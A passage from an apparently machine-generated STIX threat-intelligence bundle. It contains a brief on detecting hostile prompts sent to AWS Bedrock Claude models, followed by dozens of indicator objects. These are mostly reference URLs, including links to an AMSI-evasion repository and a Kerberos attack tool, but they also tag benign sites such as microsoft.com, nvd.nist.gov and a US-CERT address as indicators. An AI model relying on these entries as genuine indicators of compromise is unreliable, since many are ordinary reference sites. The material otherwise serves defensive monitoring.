      "description": "## Overview\n\nThis threat brief details a method for detecting hostile or aggressive sentiment within prompts submitted to AWS Bedrock Claude large language models. Such prompts can signify potential abuse, harassment, or other malicious intentions, including attempts to bypass safety filters or manipulate model behavior. The detection mechanism analyzes Bedrock model invocation logs for specific keywords and phrases indicative of hostility, assigning a risk score to classify prompts. Organizations leveraging AWS Bedrock with Claude models should implement comprehensive logging of model invocations to capture prompt payloads and integrate these logs into their security monitoring platforms like Splunk, enabling early identification of suspicious interactions and potential misuse of generative AI capabilities.\n\n## Impact\n\nThe impact of hostile prompt sentiment can range from reputational damage to the AI service provider and the organization deploying the models, to operational disruptions and potential data exfiltration or policy violations if attackers successfully coerce the model. Continuous harassment can degrade the user experience for legitimate users and may incur unnecessary compute costs. In scenarios where prompts are designed to bypass safety filters, it could lead to the generation of harmful, biased, or inappropriate content, or even facilitate sensitive information disclosure through sophisticated prompt injection techniques. Unchecked hostile interactions can undermine trust in AI systems and lead to compliance issues.\n\n## Recommendation\n\n*   Configure Amazon Bedrock model invocation logging to deliver Claude request/response payloads to S3 and/or CloudWatch Logs as detailed in the AWS documentation (https://docs.aws.amazon.com/bedrock/latest/userguide/model-invocation-logging.html).\n*   Ensure these Bedrock model invocation logs are ingested into your SIEM, like Splunk, by installing and configuring the Splunk Add-on for AWS (https://splunkbase.splunk.com/app/1876).\n*   Deploy the `Detect Hostile Prompts in AWS Bedrock Claude` Sigma rule to your SIEM and tune it for your specific environment, accounting for known false positives related to role-playing or legitimate testing.\n*   Review any alerts generated by the `Detect Hostile Prompts in AWS Bedrock Claude` rule to determine if the detected prompt represents actual hostile intent or a benign usage pattern based on context.\n",
      "published": "2026-07-07T08:22:03Z",
      "labels": [
        "llm",
        "aws",
        "bedrock",
        "abuse",
        "sentiment",
        "cloud"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/application/aws_bedrock_claude_hostile_prompt_sentiment.yml"
        },
        {
          "source_name": "reference",
          "url": "https://aws.amazon.com/blogs/apn/unlocking-the-power-of-splunk-with-amazon-bedrock-an-agentic-ai-approach-to-build-customized-splunk-assistants-using-bedrock-agents/"
        },
        {
          "source_name": "reference",
          "url": "https://help.splunk.com/en/splunk-observability-cloud/observability-for-ai/splunk-ai-infrastructure-monitoring/set-up-ai-infrastructure-monitoring/amazon-bedrock"
        },
        {
          "source_name": "reference",
          "url": "https://research.splunk.com/stories/aws_bedrock_security/"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/bedrock/latest/userguide/model-invocation-logging.html"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/privilege_escalation_bedrock_phantom_user_credentials_added.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--99eaa171-a48d-5425-b11c-344aabf5d45c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
      "pattern": "[url:value = 'https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4ccbb120-c57f-5c79-bcb7-a1036ba0b518",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--99eaa171-a48d-5425-b11c-344aabf5d45c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b5b6e70d-6f9a-5379-9f4a-a87c1cbc8bfc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html",
      "pattern": "[url:value = 'https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1fcdb312-5159-525a-bf15-ff2e4ac47d37",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--b5b6e70d-6f9a-5379-9f4a-a87c1cbc8bfc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9497002e-6169-58bc-acbe-1a9b8eedea58",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://app.any.run/tasks/cf1245de-06a7-4366-8209-8e3006f2bfe5/",
      "pattern": "[url:value = 'https://app.any.run/tasks/cf1245de-06a7-4366-8209-8e3006f2bfe5/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f0003505-7b84-59e4-ac4f-69240958d033",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--9497002e-6169-58bc-acbe-1a9b8eedea58"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ade583a7-d0b6-5e42-b002-ea0a0f9d4ab5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/",
      "pattern": "[url:value = 'https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dd9206df-63f7-5251-9ab5-97f5c3208c18",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--ade583a7-d0b6-5e42-b002-ea0a0f9d4ab5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a1469590-9a8c-544a-9933-d46973047233",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1059.001/import_applocker_policy/windows-powershell-xml2.log",
      "pattern": "[url:value = 'https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1059.001/import_applocker_policy/windows-powershell-xml2.log']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--22bc5e47-e3ef-54de-b4b6-42ef354e7104",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--a1469590-9a8c-544a-9933-d46973047233"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bda38f91-cb5e-56bf-ab75-d73ac0dfb1cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://devblogs.microsoft.com/scripting/automating-quser-through-powershell/",
      "pattern": "[url:value = 'https://devblogs.microsoft.com/scripting/automating-quser-through-powershell/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b95de0b-6313-5e71-86c3-3e89a52cb71a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--bda38f91-cb5e-56bf-ab75-d73ac0dfb1cc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3854d65d-8e73-5c6d-bd55-8c73dd0ae4ff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1531/log_off_user/pwh_quser_logoff.log",
      "pattern": "[url:value = 'https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1531/log_off_user/pwh_quser_logoff.log']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bc315f3e-83ad-5ff5-b425-a1435599b1b2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--3854d65d-8e73-5c6d-bd55-8c73dd0ae4ff"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2ad8d572-d47d-5633-88fd-8be3d9c40395",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://sploitus.com/exploit?id=816BFD0D-57FA-5C9C-B54C-3F0F88BD2C84",
      "pattern": "[url:value = 'https://sploitus.com/exploit?id=816BFD0D-57FA-5C9C-B54C-3F0F88BD2C84']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0cb19009-4641-55e9-b545-8aaf4a1bf178",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--2ad8d572-d47d-5633-88fd-8be3d9c40395"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--26c5c80d-6bfe-5b20-80f9-11431f5f6cc5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: sharepoint.local",
      "pattern": "[domain-name:value = 'sharepoint.local']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--abdfb5e7-dffd-52fe-a04a-cd0857199396",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--26c5c80d-6bfe-5b20-80f9-11431f5f6cc5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--508c9b85-b0f7-5a40-b327-9196b1d99043",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://127.0.0.1:8080",
      "pattern": "[url:value = 'http://127.0.0.1:8080']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b18c89a7-1c5e-5fe6-b5f2-02a241d3c503",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--508c9b85-b0f7-5a40-b327-9196b1d99043"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0df8a8ba-a579-5ad8-9027-e1ab1759716d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: graph.windows.net",
      "pattern": "[domain-name:value = 'graph.windows.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--200abdef-5a31-56ef-8f1c-41f95f8cbb4c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--0df8a8ba-a579-5ad8-9027-e1ab1759716d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--53b08a03-5197-5d35-a9ce-515971533604",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/andreisss/Ghosting-AMSI",
      "pattern": "[url:value = 'https://github.com/andreisss/Ghosting-AMSI']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--98bb930d-206a-5210-a778-13331c1c5fbf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--53b08a03-5197-5d35-a9ce-515971533604"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--51b2eab1-fe66-5c8c-aefe-db3a4dd1fd30",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: nvd.nist.gov",
      "pattern": "[domain-name:value = 'nvd.nist.gov']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fc7ae724-97e9-5323-864c-84d95f1a3a98",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--51b2eab1-fe66-5c8c-aefe-db3a4dd1fd30"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--531f6dd3-2d74-57d0-949a-1d1da9e8ec66",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: msrc.microsoft.com",
      "pattern": "[domain-name:value = 'msrc.microsoft.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--54b8eabd-743c-5dfe-87e3-ed1873ecde6d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--531f6dd3-2d74-57d0-949a-1d1da9e8ec66"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5edcdd9f-155e-50a0-bf86-5a1f32b8a272",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57983",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57983']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a259523a-12b8-539d-a5e5-2ef61dc0c55d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--5edcdd9f-155e-50a0-bf86-5a1f32b8a272"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--22a47b60-8865-535a-8f14-e915a8128bb1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: nvd@nist.gov",
      "pattern": "[email-addr:value = 'nvd@nist.gov']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a2984fad-789c-5ade-8809-4ce4387f053f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--22a47b60-8865-535a-8f14-e915a8128bb1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--35126508-6497-5438-aaa9-833e8c34a868",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: soc@us-cert.gov",
      "pattern": "[email-addr:value = 'soc@us-cert.gov']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9cbb3f3b-ddd8-5a86-bbf8-580edd7d57ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--35126508-6497-5438-aaa9-833e8c34a868"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e682bb6c-4c89-5049-8fc4-4927cb35c8f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58288",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58288']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad0bf294-fb90-52a8-934d-d16ec4461fd4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--e682bb6c-4c89-5049-8fc4-4927cb35c8f4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--59499f6c-9e51-5ba8-a11b-9abaa8e90a43",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://nvd.nist.gov",
      "pattern": "[url:value = 'https://nvd.nist.gov']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e1ea0464-2be7-570e-834e-0b8f67074897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--59499f6c-9e51-5ba8-a11b-9abaa8e90a43"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cc422e5b-e03b-509b-8f23-1b671f9e4290",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58292",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58292']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4a1322c0-ea3d-54e2-a797-0b9668aa9962",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--cc422e5b-e03b-509b-8f23-1b671f9e4290"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--94875413-4d87-592e-b755-5bab0a304c12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: nist.gov",
      "pattern": "[domain-name:value = 'nist.gov']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b547c40d-6a09-512a-82f9-b6cde4d984e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--94875413-4d87-592e-b755-5bab0a304c12"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--439f0e02-4eb9-5ccd-91ef-236e6500886e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: microsoft.com",
      "pattern": "[domain-name:value = 'microsoft.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--71250996-52cd-5b93-8206-eb8d315e6f4f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--439f0e02-4eb9-5ccd-91ef-236e6500886e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--35346df7-cd8b-58b3-9bff-e0bdce78deb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58297",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58297']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aecd7e10-d435-5742-a5a8-233c795afa40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--35346df7-cd8b-58b3-9bff-e0bdce78deb3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--55f3dff4-d214-5d6c-89ea-8cee16559405",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://microsoft.com/devicelogin",
      "pattern": "[url:value = 'https://microsoft.com/devicelogin']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8c3f34c7-30d7-57a9-a1ea-76fb36a1e83c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--55f3dff4-d214-5d6c-89ea-8cee16559405"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a6707b77-eb5d-5098-b7e0-f8fea44a97f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://login.microsoftonline.com/{tenant}/oauth2/v2.0/devicecode",
      "pattern": "[url:value = 'https://login.microsoftonline.com/{tenant}/oauth2/v2.0/devicecode']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--31584af0-7c7e-5b8d-904c-0855df52d75b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--a6707b77-eb5d-5098-b7e0-f8fea44a97f6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--541e16ee-1760-56ba-9b79-205269084fc7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token",
      "pattern": "[url:value = 'https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6f05332d-144e-5e89-80b7-52c928541f6c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--541e16ee-1760-56ba-9b79-205269084fc7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f8a99d05-fafe-53bc-a5f5-cd689a52a19e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf",
      "pattern": "[url:value = 'https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f59a69a0-322f-53dc-818a-65ee15f58c15",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--f8a99d05-fafe-53bc-a5f5-cd689a52a19e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ae3742f3-2918-5213-9c3d-9bde5ddd284f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://twitter.com/pr0xylife/status/1585612370441031680?s=46\u0026t=Dc3CJi4AnM-8rNoacLbScg",
      "pattern": "[url:value = 'https://twitter.com/pr0xylife/status/1585612370441031680?s=46\u0026t=Dc3CJi4AnM-8rNoacLbScg']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6a5b2385-8271-5e5e-8777-136caa0c906e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--ae3742f3-2918-5213-9c3d-9bde5ddd284f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5497f7f2-b232-5434-be81-a4449d780b01",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/",
      "pattern": "[url:value = 'https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8e788b6c-d2aa-5017-b51d-0ed592050869",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--5497f7f2-b232-5434-be81-a4449d780b01"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6470276b-34e1-57ef-a826-742aa376fe5c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/malware/qakbot/qbot_wermgr2/sysmon_wermgr2.log",
      "pattern": "[url:value = 'https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/malware/qakbot/qbot_wermgr2/sysmon_wermgr2.log']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--25c1be92-aa33-577b-8fca-ecd40bb355d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--6470276b-34e1-57ef-a826-742aa376fe5c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a61c99da-d932-526e-8c6a-6eae9d5b0d5f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/its-a-feature/bifrost",
      "pattern": "[url:value = 'https://github.com/its-a-feature/bifrost']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0898fb3-07dd-50b1-b9fa-c6c8be5e7617",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--a61c99da-d932-526e-8c6a-6eae9d5b0d5f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6a24c719-6a02-5728-9a86-9002074764d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
